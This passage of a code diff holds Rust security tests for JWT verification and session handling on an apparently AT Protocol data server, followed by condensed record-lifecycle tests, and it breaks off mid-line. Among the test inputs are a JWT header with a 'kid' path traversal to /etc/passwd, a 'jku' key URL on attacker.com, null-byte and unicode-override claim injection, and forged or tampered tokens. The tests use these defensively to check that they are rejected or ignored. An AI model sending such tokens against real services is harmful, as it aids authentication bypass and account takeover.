&key_bytes).unwrap(); 125 + assert!(verify_access_token(&service_token, &key_bytes).is_err(), "Service token as access must be rejected"); 126 } 127 128 #[test] 129 + fn test_scope_validation() { 130 let key_bytes = generate_user_key(); 131 let did = "did:plc:test"; 132 + let header = json!({ "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS }); 133 134 + let invalid_scope = json!({ 135 + "iss": did, "sub": did, "aud": "did:web:test.pds", 136 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 137 + "jti": "test", "scope": "admin.all" 138 }); 139 + let result = verify_access_token(&create_custom_jwt(&header, &invalid_scope, &key_bytes), &key_bytes); 140 + assert!(result.is_err() && result.err().unwrap().to_string().contains("Invalid token scope")); 141 142 + let empty_scope = json!({ 143 + "iss": did, "sub": did, "aud": "did:web:test.pds", 144 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 145 + "jti": "test", "scope": "" 146 }); 147 + assert!(verify_access_token(&create_custom_jwt(&header, &empty_scope, &key_bytes), &key_bytes).is_err()); 148 149 + let missing_scope = json!({ 150 + "iss": did, "sub": did, "aud": "did:web:test.pds", 151 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 152 + "jti": "test" 153 }); 154 + assert!(verify_access_token(&create_custom_jwt(&header, &missing_scope, &key_bytes), &key_bytes).is_err()); 155 + 156 + for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] { 157 + let claims = json!({ 158 + "iss": did, "sub": did, "aud": "did:web:test.pds", 159 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 160 + "jti": "test", "scope": scope 161 + }); 162 + assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()); 163 + } 164 + 165 + let refresh_scope = json!({ 166 + "iss": did, "sub": did, "aud": "did:web:test.pds", 167 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 168 + "jti": "test", "scope": SCOPE_REFRESH 169 }); 170 + assert!(verify_access_token(&create_custom_jwt(&header, &refresh_scope, &key_bytes), &key_bytes).is_err()); 171 } 172 173 #[test] 174 + fn test_expiration_and_timing() { 175 let key_bytes = generate_user_key(); 176 let did = "did:plc:test"; 177 + let header = json!({ "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS }); 178 + let now = Utc::now().timestamp(); 179 + 180 + let expired = json!({ 181 + "iss": did, "sub": did, "aud": "did:web:test.pds", 182 + "iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS 183 }); 184 + let result = verify_access_token(&create_custom_jwt(&header, &expired, &key_bytes), &key_bytes); 185 + assert!(result.is_err() && result.err().unwrap().to_string().contains("expired")); 186 + 187 + let future_iat = json!({ 188 + "iss": did, "sub": did, "aud": "did:web:test.pds", 189 + "iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS 190 }); 191 + assert!(verify_access_token(&create_custom_jwt(&header, &future_iat, &key_bytes), &key_bytes).is_ok()); 192 193 + let just_expired = json!({ 194 + "iss": did, "sub": did, "aud": "did:web:test.pds", 195 + "iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS 196 + }); 197 + assert!(verify_access_token(&create_custom_jwt(&header, &just_expired, &key_bytes), &key_bytes).is_err()); 198 199 + let far_future = json!({ 200 + "iss": did, "sub": did, "aud": "did:web:test.pds", 201 + "iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS 202 + }); 203 + let _ = verify_access_token(&create_custom_jwt(&header, &far_future, &key_bytes), &key_bytes); 204 205 + let negative_iat = json!({ 206 + "iss": did, "sub": did, "aud": "did:web:test.pds", 207 + "iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS 208 + }); 209 + let _ = verify_access_token(&create_custom_jwt(&header, &negative_iat, &key_bytes), &key_bytes); 210 } 211 212 #[test] 213 + fn test_malformed_tokens() { 214 let key_bytes = generate_user_key(); 215 216 + for token in ["", "not-a-token", "one.two", "one.two.three.four", "....", 217 + "eyJhbGciOiJFUzI1NksifQ", "eyJhbGciOiJFUzI1NksifQ.", "eyJhbGciOiJFUzI1NksifQ..", 218 + ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig"] { 219 + assert!(verify_access_token(token, &key_bytes).is_err(), "Malformed token must be rejected"); 220 } 221 222 let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}"); 223 let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#); 224 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 225 + assert!(verify_access_token(&format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), &key_bytes).is_err()); 226 227 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#); 228 let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}"); 229 + assert!(verify_access_token(&format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), &key_bytes).is_err()); 230 } 231 232 #[test] 233 + fn test_claim_validation() { 234 let key_bytes = generate_user_key(); 235 let did = "did:plc:test"; 236 + let header = json!({ "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS }); 237 238 + let missing_exp = json!({ 239 + "iss": did, "sub": did, "aud": "did:web:test", 240 + "iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS 241 }); 242 + assert!(verify_access_token(&create_custom_jwt(&header, &missing_exp, &key_bytes), &key_bytes).is_err()); 243 244 + let missing_iat = json!({ 245 + "iss": did, "sub": did, "aud": "did:web:test", 246 + "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 247 }); 248 + assert!(verify_access_token(&create_custom_jwt(&header, &missing_iat, &key_bytes), &key_bytes).is_err()); 249 250 + let missing_sub = json!({ 251 + "iss": did, "aud": "did:web:test", 252 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 253 + }); 254 + assert!(verify_access_token(&create_custom_jwt(&header, &missing_sub, &key_bytes), &key_bytes).is_err()); 255 256 + let wrong_types = json!({ 257 + "iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"}, 258 + "iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS 259 + }); 260 + assert!(verify_access_token(&create_custom_jwt(&header, &wrong_types, &key_bytes), &key_bytes).is_err()); 261 262 + let unicode_injection = json!({ 263 + "iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta", 264 + "aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 265 + "jti": "test", "scope": SCOPE_ACCESS 266 }); 267 + if let Ok(data) = verify_access_token(&create_custom_jwt(&header, &unicode_injection, &key_bytes), &key_bytes) { 268 + assert!(!data.claims.sub.contains('\0')); 269 + } 270 } 271 272 #[test] 273 + fn test_did_and_jti_extraction() { 274 let key_bytes = generate_user_key(); 275 let did = "did:plc:legitimate"; 276 let token = create_access_token(did, &key_bytes).expect("create token"); 277 + 278 + assert_eq!(get_did_from_token(&token).unwrap(), did); 279 assert!(get_did_from_token("invalid").is_err()); 280 assert!(get_did_from_token("a.b").is_err()); 281 assert!(get_did_from_token("").is_err()); 282 283 + let jti = get_jti_from_token(&token).unwrap(); 284 assert!(!jti.is_empty()); 285 assert!(get_jti_from_token("invalid").is_err()); 286 + 287 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K"}"#); 288 + let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:iss","sub":"did:plc:sub"}"#); 289 let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 290 + let unverified = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 291 + assert_eq!(get_did_from_token(&unverified).unwrap(), "did:plc:sub"); 292 293 + let no_jti_claims = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:test"}"#); 294 + assert!(get_jti_from_token(&format!("{}.{}.{}", header_b64, no_jti_claims, fake_sig)).is_err()); 295 } 296 297 #[test] 298 + fn test_header_injection_and_constant_time() { 299 let key_bytes = generate_user_key(); 300 let did = "did:plc:test"; 301 302 let header = json!({ 303 + "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS, 304 + "kid": "../../../../../../etc/passwd", "jku": "https://attacker.com/keys" 305 }); 306 let claims = json!({ 307 + "iss": did, "sub": did, "aud": "did:web:test.pds", 308 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 309 + "jti": "test", "scope": SCOPE_ACCESS 310 }); 311 + assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()); 312 313 + let valid_token = create_access_token(did, &key_bytes).expect("create token"); 314 + let parts: Vec<&str> = valid_token.split('.').collect(); 315 + let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 316 + almost_valid[0] ^= 1; 317 + let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&almost_valid)); 318 + let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&[0xFFu8; 64])); 319 + let _ = verify_access_token(&almost_valid_token, &key_bytes); 320 + let _ = verify_access_token(&completely_invalid_token, &key_bytes); 321 } 322 323 #[tokio::test] 324 + async fn test_server_rejects_invalid_tokens() { 325 let url = base_url().await; 326 let http_client = client(); 327 + 328 let key_bytes = generate_user_key(); 329 + let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap(); 330 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 331 .header("Authorization", format!("Bearer {}", forged_token)) 332 + .send().await.unwrap(); 333 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged token must be rejected"); 334 335 let (access_jwt, _did) = create_account_and_login(&http_client).await; 336 let parts: Vec<&str> = access_jwt.split('.').collect(); 337 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 338 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 339 + 340 payload["exp"] = json!(Utc::now().timestamp() - 3600); 341 + let expired_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), parts[2]); 342 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 343 + .header("Authorization", format!("Bearer {}", expired_token)) 344 + .send().await.unwrap(); 345 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 346 347 + let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 348 + tampered_payload["sub"] = json!("did:plc:attacker"); 349 + tampered_payload["iss"] = json!("did:plc:attacker"); 350 + let tampered_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), parts[2]); 351 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 352 .header("Authorization", format!("Bearer {}", tampered_token)) 353 + .send().await.unwrap(); 354 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 355 } 356 357 #[tokio::test] 358 + async fn test_authorization_header_formats() { 359 let url = base_url().await; 360 let http_client = client(); 361 + let (access_jwt, _did) = create_account_and_login(&http_client).await; 362 363 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 364 .header("Authorization", format!("Bearer {}", access_jwt)) 365 + .send().await.unwrap(); 366 + assert_eq!(res.status(), StatusCode::OK); 367 + 368 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 369 .header("Authorization", format!("bearer {}", access_jwt)) 370 + .send().await.unwrap(); 371 + assert_eq!(res.status(), StatusCode::OK); 372 + 373 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 374 .header("Authorization", format!("Basic {}", access_jwt)) 375 + .send().await.unwrap(); 376 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 377 + 378 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 379 .header("Authorization", &access_jwt) 380 + .send().await.unwrap(); 381 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 382 + 383 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 384 .header("Authorization", "Bearer ") 385 + .send().await.unwrap(); 386 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 387 } 388 389 #[tokio::test] 390 + async fn test_session_lifecycle_security() { 391 let url = base_url().await; 392 let http_client = client(); 393 let (access_jwt, _did) = create_account_and_login(&http_client).await; 394 + 395 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 396 .header("Authorization", format!("Bearer {}", access_jwt)) 397 + .send().await.unwrap(); 398 + assert_eq!(res.status(), StatusCode::OK); 399 + 400 + let logout = http_client.post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 401 .header("Authorization", format!("Bearer {}", access_jwt)) 402 + .send().await.unwrap(); 403 + assert_eq!(logout.status(), StatusCode::OK); 404 + 405 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 406 .header("Authorization", format!("Bearer {}", access_jwt)) 407 + .send().await.unwrap(); 408 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 409 } 410 411 #[tokio::test] 412 + async fn test_deactivated_account_rejected() { 413 let url = base_url().await; 414 let http_client = client(); 415 let (access_jwt, _did) = create_account_and_login(&http_client).await; 416 + 417 + let deact = http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 418 .header("Authorization", format!("Bearer {}", access_jwt)) 419 .json(&json!({})) 420 + .send().await.unwrap(); 421 + assert_eq!(deact.status(), StatusCode::OK); 422 + 423 + let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 424 .header("Authorization", format!("Bearer {}", access_jwt)) 425 + .send().await.unwrap(); 426 + assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 427 + let body: Value = res.json().await.unwrap(); 428 assert_eq!(body["error"], "AccountDeactivated"); 429 } 430 + 431 + #[tokio::test] 432 + async fn test_refresh_token_replay_protection() { 433 + let url = base_url().await; 434 + let http_client = client(); 435 + let ts = Utc::now().timestamp_millis(); 436 + let handle = format!("rt-replay-jwt-{}", ts); 437 + let email = format!("rt-replay-jwt-{}@example.com", ts); 438 + 439 + let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 440 + .json(&json!({ "handle": handle, "email": email, "password": "test-password-123" })) 441 + .send().await.unwrap(); 442 + assert_eq!(create_res.status(), StatusCode::OK); 443 + let account: Value = create_res.json().await.unwrap(); 444 + let did = account["did"].as_str().unwrap(); 445 + 446 + let pool = sqlx::postgres::PgPoolOptions::new() 447 + .max_connections(2) 448 + .connect(&get_db_connection_string().await) 449 + .await.unwrap(); 450 + let code: String = sqlx::query_scalar!( 451 + "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'", 452 + did 453 + ).fetch_one(&pool).await.unwrap(); 454 + 455 + let confirm = http_client.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url)) 456 + .json(&json!({ "did": did, "verificationCode": code })) 457 + .send().await.unwrap(); 458 + assert_eq!(confirm.status(), StatusCode::OK); 459 + let confirmed: Value = confirm.json().await.unwrap(); 460 + let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string(); 461 + 462 + let first = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 463 + .header("Authorization", format!("Bearer {}", refresh_jwt)) 464 + .send().await.unwrap(); 465 + assert_eq!(first.status(), StatusCode::OK); 466 + 467 + let replay = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 468 + .header("Authorization", format!("Bearer {}", refresh_jwt)) 469 + .send().await.unwrap(); 470 + assert_eq!(replay.status(), StatusCode::UNAUTHORIZED); 471 + }
+190 -1060
tests/lifecycle_record.rs
··· 8 use std::time::Duration; 9 10 #[tokio::test] 11 - async fn test_post_crud_lifecycle() { 12 let client = client(); 13 let (did, jwt) = setup_new_user("lifecycle-crud").await; 14 let collection = "app.bsky.feed.post"; ··· 26 } 27 }); 28 let create_res = client 29 - .post(format!( 30 - "{}/xrpc/com.atproto.repo.putRecord", 31 - base_url().await 32 - )) 33 .bearer_auth(&jwt) 34 .json(&create_payload) 35 .send() 36 .await 37 .expect("Failed to send create request"); 38 - if create_res.status() != reqwest::StatusCode::OK { 39 - let status = create_res.status(); 40 - let body = create_res 41 - .text() 42 - .await 43 - .unwrap_or_else(|_| "Could not get body".to_string()); 44 - panic!( 45 - "Failed to create record. Status: {}, Body: {}", 46 - status, body 47 - ); 48 - } 49 - let create_body: Value = create_res 50 - .json() 51 - .await 52 - .expect("create response was not JSON"); 53 let uri = create_body["uri"].as_str().unwrap(); 54 - let params = [ 55 - ("repo", did.as_str()), 56 - ("collection", collection), 57 - ("rkey", &rkey), 58 - ]; 59 let get_res = client 60 - .get(format!( 61 - "{}/xrpc/com.atproto.repo.getRecord", 62 - base_url().await 63 - )) 64 .query(&params) 65 .send() 66 .await 67 .expect("Failed to send get request"); 68 - assert_eq!( 69 - get_res.status(), 70 - reqwest::StatusCode::OK, 71 - "Failed to get record after create" 72 - ); 73 let get_body: Value = get_res.json().await.expect("get response was not JSON"); 74 assert_eq!(get_body["uri"], uri); 75 assert_eq!(get_body["value"]["text"], original_text); ··· 78 "repo": did, 79 "collection": collection, 80 "rkey": rkey, 81 - "record": { 82 - "$type": collection, 83 - "text": updated_text, 84 - "createdAt": now 85 - } 86 }); 87 let update_res = client 88 - .post(format!( 89 - "{}/xrpc/com.atproto.repo.putRecord", 90 - base_url().await 91 - )) 92 .bearer_auth(&jwt) 93 .json(&update_payload) 94 .send() 95 .await 96 .expect("Failed to send update request"); 97 - assert_eq!( 98 - update_res.status(), 99 - reqwest::StatusCode::OK, 100 - "Failed to update record" 101 - ); 102 let get_updated_res = client 103 - .get(format!( 104 - "{}/xrpc/com.atproto.repo.getRecord", 105 - base_url().await 106 - )) 107 .query(&params) 108 .send() 109 .await 110 .expect("Failed to send get-after-update request"); 111 - assert_eq!( 112 - get_updated_res.status(), 113 - reqwest::StatusCode::OK, 114 - "Failed to get record after update" 115 - ); 116 - let get_updated_body: Value = get_updated_res 117 - .json() 118 .await 119 - .expect("get-updated response was not JSON"); 120 - assert_eq!( 121 - get_updated_body["value"]["text"], updated_text, 122 - "Text was not updated" 123 - ); 124 - let delete_payload = json!({ 125 "repo": did, 126 "collection": collection, 127 - "rkey": rkey 128 }); 129 let delete_res = client 130 - .post(format!( 131 - "{}/xrpc/com.atproto.repo.deleteRecord", 132 - base_url().await 133 - )) 134 .bearer_auth(&jwt) 135 .json(&delete_payload) 136 .send() 137 .await 138 .expect("Failed to send delete request"); 139 - assert_eq!( 140 - delete_res.status(), 141 - reqwest::StatusCode::OK, 142 - "Failed to delete record" 143 - ); 144 let get_deleted_res = client 145 - .get(format!( 146 - "{}/xrpc/com.atproto.repo.getRecord", 147 - base_url().await 148 - )) 149 .query(&params) 150 .send() 151 .await 152 .expect("Failed to send get-after-delete request"); 153 - assert_eq!( 154 - get_deleted_res.status(), 155 - reqwest::StatusCode::NOT_FOUND, 156 - "Record was found, but it should be deleted" 157 - ); 158 } 159 160 #[tokio::test] 161 - async fn test_record_update_conflict_lifecycle() { 162 let client = client(); 163 - let (user_did, user_jwt) = setup_new_user("user-conflict").await; 164 - let profile_payload = json!({ 165 - "repo": user_did, 166 - "collection": "app.bsky.actor.profile", 167 - "rkey": "self", 168 - "record": { 169 - "$type": "app.bsky.actor.profile", 170 - "displayName": "Original Name" 171 - } 172 - }); 173 - let create_res = client 174 - .post(format!( 175 - "{}/xrpc/com.atproto.repo.putRecord", 176 - base_url().await 177 - )) 178 - .bearer_auth(&user_jwt) 179 - .json(&profile_payload) 180 .send() 181 .await 182 - .expect("create profile failed"); 183 - if create_res.status() != reqwest::StatusCode::OK { 184 - return; 185 - } 186 - let get_res = client 187 - .get(format!( 188 - "{}/xrpc/com.atproto.repo.getRecord", 189 - base_url().await 190 - )) 191 - .query(&[ 192 - ("repo", &user_did), 193 - ("collection", &"app.bsky.actor.profile".to_string()), 194 - ("rkey", &"self".to_string()), 195 - ]) 196 - .send() 197 - .await 198 - .expect("getRecord failed"); 199 - let get_body: Value = get_res.json().await.expect("getRecord not json"); 200 - let cid_v1 = get_body["cid"] 201 - .as_str() 202 - .expect("Profile v1 had no CID") 203 - .to_string(); 204 - let update_payload_v2 = json!({ 205 - "repo": user_did, 206 - "collection": "app.bsky.actor.profile", 207 - "rkey": "self", 208 - "record": { 209 - "$type": "app.bsky.actor.profile", 210 - "displayName": "Updated Name (v2)" 211 - }, 212 - "swapRecord": cid_v1 213 - }); 214 - let update_res_v2 = client 215 - .post(format!( 216 - "{}/xrpc/com.atproto.repo.putRecord", 217 - base_url().await 218 - )) 219 - .bearer_auth(&user_jwt) 220 - .json(&update_payload_v2) 221 - .send() 222 - .await 223 - .expect("putRecord v2 failed"); 224 - assert_eq!( 225 - update_res_v2.status(), 226 - reqwest::StatusCode::OK, 227 - "v2 update failed" 228 - ); 229 - let update_body_v2: Value = update_res_v2.json().await.expect("v2 body not json"); 230 - let cid_v2 = update_body_v2["cid"] 231 - .as_str() 232 - .expect("v2 response had no CID") 233 - .to_string(); 234 - let update_payload_v3_stale = json!({ 235 - "repo": user_did, 236 - "collection": "app.bsky.actor.profile", 237 - "rkey": "self", 238 - "record": { 239 - "$type": "app.bsky.actor.profile", 240 - "displayName": "Stale Update (v3)" 241 - }, 242 - "swapRecord": cid_v1 243 - }); 244 - let update_res_v3_stale = client 245 - .post(format!( 246 - "{}/xrpc/com.atproto.repo.putRecord", 247 - base_url().await 248 - )) 249 - .bearer_auth(&user_jwt) 250 - .json(&update_payload_v3_stale) 251 - .send() 252 - .await 253 - .expect("putRecord v3 (stale) failed"); 254 - assert_eq!( 255 - update_res_v3_stale.status(), 256 - reqwest::StatusCode::CONFLICT, 257 - "Stale update did not cause a 409 Conflict" 258 - ); 259 - let update_payload_v3_good = json!({ 260 - "repo": user_did, 261 - "collection": "app.bsky.actor.profile", 262 - "rkey": "self", 263 - "record": { 264 - "$type": "app.bsky.actor.profile", 265 - "displayName": "Good Update (v3)" 266 - }, 267 - "swapRecord": cid_v2 268 - }); 269 - let update_res_v3_good = client 270 - .post(format!( 271 - "{}/xrpc/com.atproto.repo.putRecord", 272 - base_url().await 273 - )) 274 - .bearer_auth(&user_jwt) 275 - .json(&update_payload_v3_good) 276 - .send() 277 - .await 278 - .expect("putRecord v3 (good) failed"); 279 - assert_eq!( 280 - update_res_v3_good.status(), 281 - reqwest::StatusCode::OK, 282 - "v3 (good) update failed" 283 - ); 284 - } 285 - 286 - #[tokio::test] 287 - async fn test_profile_lifecycle() { 288 - let client = client(); 289 - let (did, jwt) = setup_new_user("profile-lifecycle").await; 290 let profile_payload = json!({ 291 "repo": did, 292 "collection": "app.bsky.actor.profile", ··· 294 "record": { 295 "$type": "app.bsky.actor.profile", 296 "displayName": "Test User", 297 - "description": "A test profile for lifecycle testing" 298 } 299 }); 300 let create_res = client 301 - .post(format!( 302 - "{}/xrpc/com.atproto.repo.putRecord", 303 - base_url().await 304 - )) 305 .bearer_auth(&jwt) 306 .json(&profile_payload) 307 .send() 308 .await 309 .expect("Failed to create profile"); 310 - assert_eq!( 311 - create_res.status(), 312 - StatusCode::OK, 313 - "Failed to create profile" 314 - ); 315 let create_body: Value = create_res.json().await.unwrap(); 316 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 317 let get_res = client 318 - .get(format!( 319 - "{}/xrpc/com.atproto.repo.getRecord", 320 - base_url().await 321 - )) 322 - .query(&[ 323 - ("repo", did.as_str()), 324 - ("collection", "app.bsky.actor.profile"), 325 - ("rkey", "self"), 326 - ]) 327 .send() 328 .await 329 .expect("Failed to get profile"); 330 assert_eq!(get_res.status(), StatusCode::OK); 331 let get_body: Value = get_res.json().await.unwrap(); 332 assert_eq!(get_body["value"]["displayName"], "Test User"); 333 - assert_eq!( 334 - get_body["value"]["description"], 335 - "A test profile for lifecycle testing" 336 - ); 337 let update_payload = json!({ 338 "repo": did, 339 "collection": "app.bsky.actor.profile", 340 "rkey": "self", 341 - "record": { 342 - "$type": "app.bsky.actor.profile", 343 - "displayName": "Updated User", 344 - "description": "Profile has been updated" 345 - }, 346 "swapRecord": initial_cid 347 }); 348 let update_res = client 349 - .post(format!( 350 - "{}/xrpc/com.atproto.repo.putRecord", 351 - base_url().await 352 - )) 353 .bearer_auth(&jwt) 354 .json(&update_payload) 355 .send() 356 .await 357 .expect("Failed to update profile"); 358 - assert_eq!( 359 - update_res.status(), 360 - StatusCode::OK, 361 - "Failed to update profile" 362 - ); 363 let get_updated_res = client 364 - .get(format!( 365 - "{}/xrpc/com.atproto.repo.getRecord", 366 - base_url().await 367 - )) 368 - .query(&[ 369 - ("repo", did.as_str()), 370 - ("collection", "app.bsky.actor.profile"), 371 - ("rkey", "self"), 372 - ]) 373 .send() 374 .await 375 .expect("Failed to get updated profile"); ··· 382 let client = client(); 383 let (alice_did, alice_jwt) = setup_new_user("alice-thread").await; 384 let (bob_did, bob_jwt) = setup_new_user("bob-thread").await; 385 - let (root_uri, root_cid) = 386 - create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 387 tokio::time::sleep(Duration::from_millis(100)).await; 388 let reply_collection = "app.bsky.feed.post"; 389 let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis()); 390 - let now = Utc::now().to_rfc3339(); 391 let reply_payload = json!({ 392 "repo": bob_did, 393 "collection": reply_collection, ··· 395 "record": { 396 "$type": reply_collection, 397 "text": "This is Bob's reply to Alice", 398 - "createdAt": now, 399 "reply": { 400 - "root": { 401 - "uri": root_uri, 402 - "cid": root_cid 403 - }, 404 - "parent": { 405 - "uri": root_uri, 406 - "cid": root_cid 407 - } 408 } 409 } 410 }); 411 let reply_res = client 412 - .post(format!( 413 - "{}/xrpc/com.atproto.repo.putRecord", 414 - base_url().await 415 - )) 416 .bearer_auth(&bob_jwt) 417 .json(&reply_payload) 418 .send() ··· 423 let reply_uri = reply_body["uri"].as_str().unwrap(); 424 let reply_cid = reply_body["cid"].as_str().unwrap(); 425 let get_reply_res = client 426 - .get(format!( 427 - "{}/xrpc/com.atproto.repo.getRecord", 428 - base_url().await 429 - )) 430 - .query(&[ 431 - ("repo", bob_did.as_str()), 432 - ("collection", reply_collection), 433 - ("rkey", reply_rkey.as_str()), 434 - ]) 435 .send() 436 .await 437 .expect("Failed to get reply"); 438 assert_eq!(get_reply_res.status(), StatusCode::OK); 439 let reply_record: Value = get_reply_res.json().await.unwrap(); 440 assert_eq!(reply_record["value"]["reply"]["root"]["uri"], root_uri); 441 - assert_eq!(reply_record["value"]["reply"]["parent"]["uri"], root_uri); 442 tokio::time::sleep(Duration::from_millis(100)).await; 443 let nested_reply_rkey = format!("e2e_nested_reply_{}", Utc::now().timestamp_millis()); 444 let nested_payload = json!({ ··· 450 "text": "Alice replies to Bob's reply", 451 "createdAt": Utc::now().to_rfc3339(), 452 "reply": { 453 - "root": { 454 - "uri": root_uri, 455 - "cid": root_cid 456 - }, 457 - "parent": { 458 - "uri": reply_uri, 459 - "cid": reply_cid 460 - } 461 } 462 } 463 }); 464 let nested_res = client 465 - .post(format!( 466 - "{}/xrpc/com.atproto.repo.putRecord", 467 - base_url().await 468 - )) 469 .bearer_auth(&alice_jwt) 470 .json(&nested_payload) 471 .send() 472 .await 473 .expect("Failed to create nested reply"); 474 - assert_eq!( 475 - nested_res.status(), 476 - StatusCode::OK, 477 - "Failed to create nested reply" 478 - ); 479 - } 480 - 481 - #[tokio::test] 482 - async fn test_blob_in_record_lifecycle() { 483 - let client = client(); 484 - let (did, jwt) = setup_new_user("blob-record").await; 485 - let blob_data = b"This is test blob data for a profile avatar"; 486 - let upload_res = client 487 - .post(format!( 488 - "{}/xrpc/com.atproto.repo.uploadBlob", 489 - base_url().await 490 - )) 491 - .header(header::CONTENT_TYPE, "text/plain") 492 - .bearer_auth(&jwt) 493 - .body(blob_data.to_vec()) 494 - .send() 495 - .await 496 - .expect("Failed to upload blob"); 497 - assert_eq!(upload_res.status(), StatusCode::OK); 498 - let upload_body: Value = upload_res.json().await.unwrap(); 499 - let blob_ref = upload_body["blob"].clone(); 500 - let profile_payload = json!({ 501 - "repo": did, 502 - "collection": "app.bsky.actor.profile", 503 - "rkey": "self", 504 - "record": { 505 - "$type": "app.bsky.actor.profile", 506 - "displayName": "User With Avatar", 507 - "avatar": blob_ref 508 - } 509 - }); 510 - let create_res = client 511 - .post(format!( 512 - "{}/xrpc/com.atproto.repo.putRecord", 513 - base_url().await 514 - )) 515 - .bearer_auth(&jwt) 516 - .json(&profile_payload) 517 - .send() 518 - .await 519 - .expect("Failed to create profile with blob"); 520 - assert_eq!( 521 - create_res.status(), 522 - StatusCode::OK, 523 - "Failed to create profile with blob" 524 - ); 525 - let get_res = client 526 - .get(format!( 527 - "{}/xrpc/com.atproto.repo.getRecord", 528 - base_url().await 529 - )) 530 - .query(&[ 531 - ("repo", did.as_str()), 532 - ("collection", "app.bsky.actor.profile"), 533 - ("rkey", "self"), 534 - ]) 535 - .send() 536 - .await 537 - .expect("Failed to get profile"); 538 - assert_eq!(get_res.status(), StatusCode::OK); 539 - let profile: Value = get_res.json().await.unwrap(); 540 - assert!(profile["value"]["avatar"]["ref"]["$link"].is_string()); 541 } 542 543 #[tokio::test] 544 - async fn test_authorization_cannot_modify_other_repo() { 545 let client = client(); 546 - let (alice_did, _alice_jwt) = setup_new_user("alice-auth").await; 547 let 